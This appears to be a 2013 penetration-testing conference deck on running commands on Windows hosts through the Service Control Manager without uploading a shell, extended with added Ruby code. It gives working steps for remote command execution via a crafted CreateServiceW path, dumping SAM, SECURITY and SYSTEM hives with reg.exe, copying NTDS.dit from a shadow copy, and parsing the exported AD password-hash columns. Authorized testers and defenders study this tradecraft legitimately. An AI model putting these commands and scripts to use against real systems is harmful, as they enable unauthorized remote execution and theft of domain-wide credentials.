Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
Owning Computers Without Shell Access
WTF is Royce Davis?
• Husband & Father
• Pentester: Accuvant LABS
• Cofounder: http://www.pentestgeek.com
• Author: jigsaw.rb
• Twitter: @R3dy__
Talk Synopsis
• Uploading Binary Shells Is No Good
• Techniques To Avoid Shell Upload
• Metasploit Modules
• Command Execution
• Local & Cached Hash Dumping
• Other Possibilities
• Demo Modules
Background Story
• Imagine that you’re on a pentest and discover a low-hanging-fruit (LHF)
vulnerability that gives you the local admin hash to
all the boxes.
• You try to use the psexec exploit module to pop a
Meterpreter shell on multiple systems, only to get
flagged by AV and stopped dead in your tracks.
• What do you do now?
• Enter SMBExec (Eric Milam a.k.a. @Brav0hax)
• SMBExec is a great tool, however it still uploads a
binary to the target
Uploading Binary Shells Is No Good
• We’ve been uploading shells to take control of remote
hosts since the beginning of time, so what’s the big
deal?
• Shells contain binary signatures that can be
recognized and blocked
• Obfuscation only creates a different signature that
could still be recognized and blocked
• Shells can die, leaving us with no way back into the
target machine
• They can also leave remnants of themselves on disk
What Can We Do With A Shell?
If we’re going to avoid using shells on pentests we first need to
identify what purpose they serve and what functions they
provide.
• Command execution
• Search the file system
• Create users
• Enumerate network resources
• Upload/download files
• Etc…
• Grab local/cached password hashes
• Dump all AD hashes from the DC
• Any others?
Using Native Windows Functions
Enter ‘psexec.rb’
• Metasploit already has several modules that use
DCERPC to make direct authenticated requests
to Windows RPC interfaces
• exploit/windows/smb/psexec.rb
• Creates & uploads a binary payload to the target over
SMB
• Sends RPC requests to the Service Control Manager (SCM)
over the svcctl interface
• UUID: ‘367abb81-9844-35f1-ad32-98f038001003’
• Creates a service, starts it, cleans up after…
• MSDN Documentation (Service Control Manager)
• http://msdn.microsoft.com/en-us/library/windows/desktop/ms685942%28v=vs.85%29.aspx
Inside psexec.rb
DCERPC Requests:
The dcerpc.call instance method takes two parameters. The first is the
opnum (operation number) of the svcctl function you wish to call. The second
is that function’s arguments marshalled in NDR (Network Data Representation)
format, the “stub data”. psexec.rb makes these calls:
• dcerpc.call(0x0f, stubdata) – OpenSCManagerW
• dcerpc.call(0x0c, stubdata) – CreateServiceW
• dcerpc.call(0x00, svc_handle) – CloseServiceHandle
• dcerpc.call(0x10, stubdata) – OpenServiceW
• dcerpc.call(0x13, stubdata) – StartServiceW
• dcerpc.call(0x02, stubdata) – DeleteService
• dcerpc.call(0x00, svc_handle) – CloseServiceHandle
Psexec.rb Cont.
• This is what it looks like inside Metasploit’s
psexec exploit module written by HDM
exploit/windows/smb/psexec.rb (line 254)
CreateService
• This is the format accepted by the CreateService
function
• http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450%28v=vs.85%29.aspx
lpBinaryPathName MSDN Definition
• lpBinaryPathName [in, optional]
• The fully qualified path to the service binary file. If the path contains a space, it must be
quoted so that it is correctly interpreted. For example, "d:\my share\myservice.exe"
should be specified as "\"d:\my share\myservice.exe\"".
• The path can also include arguments for an auto-start service. For example,
"d:\myshare\myservice.exe arg1 arg2". These arguments are passed to the service
entry point (typically the main function).
• If you specify a path on another computer, the share must be accessible by the
computer account of the local computer because this is the security context used in the
remote call. However, this requirement allows any potential vulnerabilities in the
remote computer to affect the local computer. Therefore, it is best to use a local file.
• psexec.rb passes something like this:
• C:\HjeKOplsYutVmBWn.exe (a randomly named file, probably a Meterpreter payload)
• What if we tried this instead:
• C:\windows\system32\cmd.exe /C echo dir C:\ ^> outputfile.txt > launchfile.bat &
C:\windows\system32\cmd.exe /C launchfile.bat
• The SCM runs whatever is in lpBinaryPathName as LocalSystem, and the path may carry
arguments, so a cmd.exe command line gets us execution with nothing uploaded
• Because cmd.exe never reports back to the SCM, StartService returns an error (the
service “did not respond in a timely fashion”) even though the command ran; that
start failure is expected, not a sign the command did not run
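Added here as a worked example, not code from the deck or from Metasploit: a Ruby sketch of the two things the last three slides describe, the NDR stub that dcerpc.call(0x0c, stubdata) carries for CreateServiceW, and a cmd.exe /C command line in the lpBinaryPathName slot in place of an uploaded binary. The NDR helpers re-implement the encoding Rex::Proto::DCERPC::NDR provides (assumed: conformant varying UTF-16LE strings, 4-byte alignment, a fixed referent id for unique pointers); the field order follows MS-SCMR RCreateServiceW, and nothing is sent on the wire.

```ruby
# Added example (not Metasploit's code): assemble the NDR stub for a svcctl
# RCreateServiceW call whose lpBinaryPathName is a cmd.exe /C command line,
# i.e. the "no upload" variant of what psexec.rb does. The NDR helpers are a
# minimal re-implementation of the encoding Rex::Proto::DCERPC::NDR performs
# (assumption: conformant varying UTF-16LE strings, 4-byte alignment). No RPC
# traffic is produced; the stub is what dcerpc.call(0x0c, stub) would carry.

SVCCTL_UUID  = '367abb81-9844-35f1-ad32-98f038001003'
SVCCTL_OPNUM = {
  close_service_handle: 0x00, delete_service: 0x02, create_service: 0x0c,
  open_sc_manager: 0x0f, open_service: 0x10, start_service: 0x13
}.freeze

module NDR
  # DWORD, little-endian.
  def self.long(value)
    [value].pack('V')
  end

  # Conformant varying UTF-16LE string: max count, offset, actual count, the
  # characters including the terminating null, padded to a 4-byte boundary.
  def self.wstring(str)
    chars = (str + "\0").encode('UTF-16LE').b
    count = chars.bytesize / 2
    data  = long(count) + long(0) + long(count) + chars
    data + ("\0" * ((4 - data.bytesize % 4) % 4))
  end

  # Unique pointer to a wstring: a non-zero referent id, then the string.
  def self.uwstring(str)
    long(0x00020000) + wstring(str)
  end
end

# Command line used as the service "binary": echo the real command into a
# batch file (the ^> keeps the redirect inside the batch file instead of
# applying it to echo), then run that batch file. Only a system binary is
# referenced; nothing is uploaded.
def service_command_line(command, output:, bat:,
                         comspec: 'C:\windows\system32\cmd.exe')
  "#{comspec} /C echo #{command} ^> #{output} > #{bat} & #{comspec} /C #{bat}"
end

# RCreateServiceW stub in MS-SCMR field order. scm_handle is the 20-byte
# context handle returned by OpenSCManagerW; NULL pointers are a zero DWORD.
def create_service_stub(scm_handle, service_name, display_name, binary_path)
  raise ArgumentError, 'SCM handle must be 20 bytes' unless scm_handle.bytesize == 20
  scm_handle.b +
    NDR.wstring(service_name) +   # lpServiceName (ref pointer)
    NDR.uwstring(display_name) +  # lpDisplayName (unique pointer)
    NDR.long(0x000F01FF) +        # dwDesiredAccess: SERVICE_ALL_ACCESS
    NDR.long(0x00000010) +        # dwServiceType: SERVICE_WIN32_OWN_PROCESS
    NDR.long(0x00000003) +        # dwStartType: SERVICE_DEMAND_START
    NDR.long(0x00000000) +        # dwErrorControl: SERVICE_ERROR_IGNORE
    NDR.wstring(binary_path) +    # lpBinaryPathName (ref pointer)
    NDR.long(0) +                 # lpLoadOrderGroup: NULL
    NDR.long(0) +                 # lpdwTagId: NULL
    NDR.long(0) +                 # lpDependencies: NULL
    NDR.long(0) +                 # dwDependSize
    NDR.long(0) +                 # lpServiceStartName: NULL (runs as LocalSystem)
    NDR.long(0) +                 # lpPassword: NULL
    NDR.long(0)                   # dwPwSize
end

if $PROGRAM_NAME == __FILE__
  cmd  = service_command_line('dir C:\\', output: 'C:\windows\temp\out.txt',
                              bat: 'C:\windows\temp\run.bat')
  stub = create_service_stub("\0" * 20, 'HjeKOplsYutVmBWn', 'HjeKOplsYutVmBWn', cmd)
  puts cmd
  puts format('opnum 0x%02x, %d-byte stub', SVCCTL_OPNUM[:create_service], stub.bytesize)
end
```

The service name and display name are the only values the target will log in the System event log when the service is created and deleted, which is worth remembering when choosing them.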
The Psexec Mixin
In order to make this functionality available to other modules we
created a mixin which has been merged into the Metasploit Framework.
lib/msf/core/exploit/smb/psexec.rb
• Slightly modified version of the original psexec.rb code wrapped in a
method which accepts a Windows command in the following format:
• [PATH TO cmd.exe] [/C] [INSERT WINDOWS COMMAND]
• The method is called like so: ‘return psexec(command)’
• Returns ‘true’ if execution was successful
• Major difference is it does not try to delete cmd.exe after execution
(the original deletes the payload it uploaded; here the “binary” is the
target’s own cmd.exe)
• Also contains a ‘smb_read_file(smbshare, host, file)’ method for
convenient retrieval of command output
Demo psexec_command.rb
• Review the source code
• Explain some of my favorite uses related to
pentesting
• Demo the module
Dumping Password Hashes
• Current methods for dumping password hashes
• Post modules that require a Meterpreter shell
• Upload a standalone binary like pwdump/fgdump…
• These methods extract specific registry key values
from the SYSTEM, SECURITY, and/or SAM registry
hives
• This process can flag antivirus
• We need to somehow retrieve a copy of the registry hives
and extract the hashes from them offline on our attacking
system
• We can look at the code from pwdump.py in the
creddump suite
Offline Password Hash Dumping
1. Authenticate to the system using a password/hash
2. Use the psexec mixin to execute the following Windows commands:
• reg.exe save HKLM\SAM c:\windows\temp\sam
• reg.exe save HKLM\SYSTEM c:\windows\temp\sys
• reg.exe save HKLM\SECURITY c:\windows\temp\sec
3. Download the registry hive copies to our attacking machine
4. Remove the registry hive copies from the target
5. Open the registry hive copies on our attacking machine and extract the
password hashes
• SAM holds the local account hashes, SECURITY holds the cached domain logon
hashes (MSCache) and LSA secrets, and SYSTEM holds the bootkey needed to
decrypt both, so all three copies are required
Demo hashgrab.rb & cachegrab.rb
• Thank you to:
• Brendan Dolan-Gavitt – author of ‘creddump’
• Carlos Perez – smart_hashdump.rb and other
modules
• Brandon Perry – tools/reg.rb
• Review the source code
• Demo the module
Dumping All the Hashes
• The holy grail of most network pentests can be found
inside an ESE (Extensible Storage Engine) database
called NTDS.dit located on the Domain Controller
• Held open and locked by the operating system while
AD is running
• Reading it live requires injecting into lsass and/or other black
magic
• Contains a boat load of information about the
domain
• Including usernames and password hashes for all
AD accounts!
Enter psexec_ntdsgrab.rb
We can use the psexec_ntdsgrab module to create a VSC (Volume Shadow Copy), or target an
existing one, and safely pull down a copy of NTDS.dit to our attacking machine.
auxiliary/admin/smb/psexec_ntdsgrab.rb
1. Use the psexec mixin to execute Windows commands for creating a VSC
• vssadmin create shadow /For=%SYSTEMDRIVE%
2. Query vssadmin for the path to the newly created VSC
• vssadmin list shadows
3. Copy NTDS.dit from the VSC to the WINDOWS\Temp directory (the shadow copy
number, 1 here, is whatever step 2 returned)
• copy /Y \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\WINDOWS\NTDS\NTDS.dit C:\WINDOWS\Temp\ntds
4. Use reg.exe to make a copy of the SYSTEM registry hive (its bootkey is
needed to decrypt the hashes in NTDS.dit)
5. Download the ‘ntds’ and ‘sys’ files to the attacking machine
6. Clean up after ourselves
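An added example, not hashgrab.rb, cachegrab.rb or psexec_ntdsgrab.rb, of the orchestration behind the “Offline Password Hash Dumping” and “Enter psexec_ntdsgrab.rb” procedures above, in Ruby so it reads like the modules it models. The Target class is hypothetical: it stands in for the psexec mixin and smb_read_file, its vssadmin output is constructed, and the file bytes it hands back carry only the headers the checks look at. The commands and paths are the ones on the slides; what the example adds is picking the right shadow copy out of the vssadmin listing, checking that the pulled files really are a registry hive (regf header) and an ESE database (0x89ABCDEF signature at offset 4) before trusting them, and cleaning up even when a step fails.

```ruby
# Added example (not hashgrab.rb, cachegrab.rb or psexec_ntdsgrab.rb): the
# orchestration behind "Offline Password Hash Dumping" and "Enter
# psexec_ntdsgrab.rb", written against a small executor so it runs offline.
# Hypothetical: Target stands in for the psexec mixin and smb_read_file; its
# vssadmin output and the file bytes it hands back are constructed.
REGF_MAGIC = 'regf'.b                # registry hive file header
ESE_MAGIC  = "\xEF\xCD\xAB\x89".b   # ESE signature 0x89ABCDEF (LE) at offset 4
FAKE_HIVE  = REGF_MAGIC + ("\0" * 28).b
FAKE_NTDS  = ("\0" * 4).b + ESE_MAGIC + ("\0" * 24).b
# Constructed `vssadmin list shadows` output with two pre-existing copies, and
# the entry the constructed target appends after `vssadmin create shadow`.
SAMPLE_VSS_LIST = <<~'OUT'
  Contents of shadow copy set ID: {1f0c8d5e-0000-0000-0000-000000000001}
        Shadow Copy ID: {2a6b4c3d-0000-0000-0000-000000000001}
           Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
  Contents of shadow copy set ID: {1f0c8d5e-0000-0000-0000-000000000002}
        Shadow Copy ID: {2a6b4c3d-0000-0000-0000-000000000002}
           Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
OUT
NEW_VSS_ENTRY = <<~'OUT'
  Shadow Copy ID: {2a6b4c3d-0000-0000-0000-000000000003}
     Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3
OUT

class Target
  attr_reader :log, :remote_files
  def initialize(vss_listing)
    @vss, @remote_files, @log = vss_listing.dup, {}, []
  end

  # Stands in for psexec(command): returns what the command would print.
  def run(cmd)
    @log << cmd
    case cmd
    when /\Avssadmin list shadows/   then @vss
    when /\Avssadmin delete shadows/ then ''
    when /\Avssadmin create shadow/  then @vss += NEW_VSS_ENTRY; 'Successfully created shadow copy'
    when /\Areg\.exe save \S+ (\S+)/ then @remote_files[$1] = FAKE_HIVE; 'The operation completed successfully.'
    when %r{\Acopy /Y \S+ShadowCopy\d+\\WINDOWS\\NTDS\\NTDS\.dit (\S+)}i
      @remote_files[$1] = FAKE_NTDS; '1 file(s) copied.'
    when /\Acopy /                   then 'The system cannot find the file specified.'
    when /\Adel \/F \/Q (\S+)/       then @remote_files.delete($1); ''
    else raise "unexpected command: #{cmd}"
    end
  end

  # Stands in for smb_read_file(share, host, path).
  def read(path)
    @remote_files.fetch(path) { raise "#{path} is not on the target" }
  end
end

# [[shadow id, device path], ...] in the order vssadmin lists them (oldest first).
def parse_shadow_copies(listing)
  ids   = listing.scan(/Shadow Copy ID:\s*(\{[0-9a-f-]+\})/i).flatten
  paths = listing.scan(/Shadow Copy Volume:\s*(\\\\\?\\GLOBALROOT\S+)/i).flatten
  raise 'unpaired vssadmin output' unless ids.size == paths.size
  ids.zip(paths)
end

# reg.exe save each hive, pull it back, check the regf header, and delete the
# remote copy whatever happens. Returns { 'SAM' => bytes, ... }.
def grab_hives(target, hives: %w[SAM SYSTEM SECURITY], tmp: 'C:\windows\temp')
  remote = hives.to_h { |h| [h, "#{tmp}\\#{h.downcase[0, 3]}"] }  # sam, sys, sec
  local  = {}
  remote.each do |hive, path|
    out = target.run("reg.exe save HKLM\\#{hive} #{path}")
    raise "reg save #{hive} failed: #{out}" unless out.include?('completed successfully')
    data = target.read(path)
    raise "#{path} is not a registry hive" unless data.start_with?(REGF_MAGIC)
    local[hive] = data
  end
  local
ensure
  remote&.each_value { |path| target.run("del /F /Q #{path}") }
end

# NTDS.dit out of a shadow copy plus the SYSTEM hive (bootkey) needed to decrypt
# it. create_vsc: false targets the newest existing copy instead of making one.
def grab_ntds(target, create_vsc: true, tmp: 'C:\windows\temp')
  before  = parse_shadow_copies(target.run('vssadmin list shadows'))
  created = nil
  if create_vsc || before.empty?
    target.run('vssadmin create shadow /For=%SYSTEMDRIVE%')
    created = (parse_shadow_copies(target.run('vssadmin list shadows')) - before).last
    raise 'shadow copy was not created' unless created
  end
  id, device  = created || before.last
  ntds_remote = "#{tmp}\\ntds"
  out = target.run("copy /Y #{device}\\WINDOWS\\NTDS\\NTDS.dit #{ntds_remote}")
  raise "copy failed: #{out}" unless out.include?('copied')
  ntds = target.read(ntds_remote)
  raise 'NTDS.dit copy is not an ESE database' unless ntds[4, 4] == ESE_MAGIC
  { shadow: id, ntds: ntds, system: grab_hives(target, hives: %w[SYSTEM], tmp: tmp)['SYSTEM'] }
ensure
  target.run("del /F /Q #{ntds_remote}") if ntds_remote
  target.run("vssadmin delete shadows /Shadow=#{created[0]} /Quiet") if created
end
```

Against a real host the executor would be the mixin’s psexec(command) plus smb_read_file; the ensure blocks are the part worth keeping, since a failed copy or download otherwise leaves hive and NTDS copies sitting in the temp directory and an extra shadow copy on the DC.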
Getting What We Want From NTDS.dit
• We’ll need to use the ‘libesedb’ C library to extract the right
tables from NTDS.dit
• $ wget https://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz
• $ tar xvzf libesedb-alpha-20120102.tar.gz
• $ cd libesedb-20120102/
• $ ./configure
• $ make && make install
• Once libesedb is compiled we will use esedbexport, located in
‘libesedb-20120102/esedbtools’, to export the datatable, which contains the
AD user account password hashes
• http://www.pentestgeek.com/2012/11/16/dumping-domain-password-hashes-using-metasploit-ntds_hashextract-rb/
Demo psexec_ntdsgrab.rb
• Grab NTDS.dit using the MSF module
• Export tables from NTDS.dit using libesedb
• Extract hashes from the exported datatable using
ntds_hashextract.rb
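An added example, not ntds_hashextract.rb, of the first pass such a script makes over the esedbexport “datatable” dump from the two slides above: selecting the columns the AD hash extraction needs and reading the RID out of each account’s SID. The column names are the attribute IDs under which NTDS.dit stores each AD attribute (sAMAccountName, objectSid, userAccountControl, unicodePwd, dBCSPwd, pekList). Assumed: esedbexport writes a tab-separated file with a header row and hex-encoded binary columns; the rows below are constructed and the encrypted blobs are placeholders. Decrypting the unicodePwd values (bootkey from the SYSTEM hive, then the PEK, then the per-RID DES keys) is the step this example stops short of, which is exactly why step 4 of the grab copies the SYSTEM hive.

```ruby
# Added example (not ntds_hashextract.rb): first pass over an esedbexport
# "datatable" dump, picking the columns AD hash extraction needs. Column names
# are the attribute IDs NTDS.dit uses. Assumed: tab-separated export with a
# header row and hex-encoded binary columns; the rows are constructed and the
# encrypted blobs are placeholders. PEK/hash decryption is not shown.

COLUMNS = {
  'ATTm590045' => :sam_account_name,
  'ATTr589970' => :object_sid,
  'ATTj589832' => :user_account_control,
  'ATTk589879' => :unicode_pwd,   # NT hash, encrypted with the PEK
  'ATTk589914' => :dbcs_pwd,      # LM hash, encrypted with the PEK
  'ATTk590689' => :pek_list       # the PEK itself, encrypted with the bootkey
}.freeze

# Constructed SIDs for S-1-5-21-1-2-3 (domain), -500 and -501. The last
# sub-authority (the RID) is stored big-endian in NTDS.dit.
DOMAIN_SID = '0104000000000005' + '15000000' + '01000000' + '02000000' + '03000000'
ADMIN_SID  = '0105000000000005' + '15000000' + '01000000' + '02000000' + '03000000' + '000001f4'
GUEST_SID  = '0105000000000005' + '15000000' + '01000000' + '02000000' + '03000000' + '000001f5'

# Constructed export: domain head row (carries pekList), two user accounts.
SAMPLE_DATATABLE = [
  %w[DNT_col ATTm590045 ATTr589970 ATTj589832 ATTk589879 ATTk589914 ATTk590689],
  ['1790', '',              DOMAIN_SID, '',    '',        '',        'cc' * 76],
  ['3562', 'Administrator', ADMIN_SID,  '512', 'aa' * 40, '',        ''],
  ['3563', 'Guest',         GUEST_SID,  '514', 'bb' * 40, 'dd' * 40, '']
].map { |cols| cols.join("\t") }.join("\n") + "\n"

# Rows as { symbol => string }, failing early if the export is the wrong table.
def parse_datatable(text)
  header, *rows = text.lines.map { |l| l.chomp.split("\t", -1) }
  missing = COLUMNS.keys - header
  raise "export lacks columns: #{missing.join(', ')}" unless missing.empty?
  index = COLUMNS.transform_keys { |col| header.index(col) }   # position => symbol
  rows.map { |row| index.to_h { |i, key| [key, row[i].to_s] } }
end

# RID = last sub-authority of the SID, big-endian as stored in the database.
def rid_from_sid(hex)
  [hex].pack('H*')[-4, 4].unpack1('N')
end

# The PEK blob plus one record per account that has a password column set.
def account_records(text)
  records = parse_datatable(text)
  pek = records.map { |r| r[:pek_list] }.find { |v| !v.empty? }
  raise 'no pekList row: wrong table or truncated export' unless pek
  accounts = records.reject { |r| r[:sam_account_name].empty? || r[:unicode_pwd].empty? }.map do |r|
    { name: r[:sam_account_name], rid: rid_from_sid(r[:object_sid]),
      disabled: (r[:user_account_control].to_i & 0x2) != 0,   # ACCOUNTDISABLE
      enc_nt_hash: r[:unicode_pwd], enc_lm_hash: r[:dbcs_pwd] }
  end
  { pek_list: pek, accounts: accounts }
end

if $PROGRAM_NAME == __FILE__
  account_records(SAMPLE_DATATABLE)[:accounts].each do |a|
    puts format('%-16s rid=%-5d disabled=%-5s nt(enc)=%s', a[:name], a[:rid], a[:disabled], a[:enc_nt_hash][0, 16])
  end
end
```

Keeping the disabled flag alongside each hash matters for reporting: a cracked hash for a disabled account is a different finding from a cracked hash for a live one.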
Closing
• Uploading a binary shell to the target can be harmful
to a penetration test
• DCERPC lets us do many of the things we
would ask of a binary shell without uploading one to
the target
• Metasploit modules already exist to achieve remote
command execution, grab local/cached password
hashes and dump AD hashes from a DC
• The sky is the limit as to what else we could do if we
all chose to adopt this style of thinking
Questions & Answers
10/4/2013
Owning Computers Without Shell Access
10/4/2013
Thank You!
Royce Davis
Accuvant LABS
Senior Consultant – Attack & Pen Team
royce.e.davis@gmail.com
http://www.pentestgeek.com
@R3dy__


Editor's Notes

  • #4 Transition into uploading shells is no good.
  • #5 Transition into what can we do with a shell, why upload one in the first place?